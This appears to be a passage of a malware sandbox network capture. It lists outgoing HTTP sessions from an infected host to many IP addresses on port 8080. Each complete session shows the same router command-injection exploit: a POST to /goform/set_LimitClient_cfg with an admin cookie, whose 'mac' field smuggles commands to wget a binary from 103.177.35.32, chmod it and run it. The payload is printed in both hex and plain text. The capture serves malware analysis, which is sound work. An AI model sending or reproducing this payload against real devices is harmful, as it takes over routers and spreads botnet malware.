                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2463192.168.2.2353192100.185.43.1668080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485066891 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2464192.168.2.2339232149.197.111.618080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485080004 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2465192.168.2.2357406212.155.31.868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485095978 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2466192.168.2.2341052112.133.39.1798080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485107899 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2467192.168.2.2333446156.182.204.1228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485143900 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2468192.168.2.235870263.151.146.1208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485156059 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2469192.168.2.2336566213.232.127.2268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485182047 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2470192.168.2.2345256157.227.106.1418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485224962 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2471192.168.2.235386290.216.208.2178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485255957 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2472192.168.2.2333198172.7.224.1348080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485282898 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2473192.168.2.2332798179.98.115.2408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485306978 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2474192.168.2.235692660.108.47.2528080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485326052 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2475192.168.2.2342928217.45.186.1758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485338926 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2476192.168.2.2345026185.91.8.2258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485343933 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2477192.168.2.2337142194.21.136.788080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485348940 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2478192.168.2.2351158159.155.247.738080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485358953 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2479192.168.2.2338626128.80.183.1208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485373974 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2480192.168.2.2344978183.103.219.268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485447884 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2481192.168.2.2353446180.123.166.2378080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485599041 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2482192.168.2.2337820180.38.147.2428080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485611916 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2483192.168.2.233758020.38.108.1778080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485625029 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2484192.168.2.233869244.185.41.1608080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485642910 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2485192.168.2.2333388187.66.176.498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485661983 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
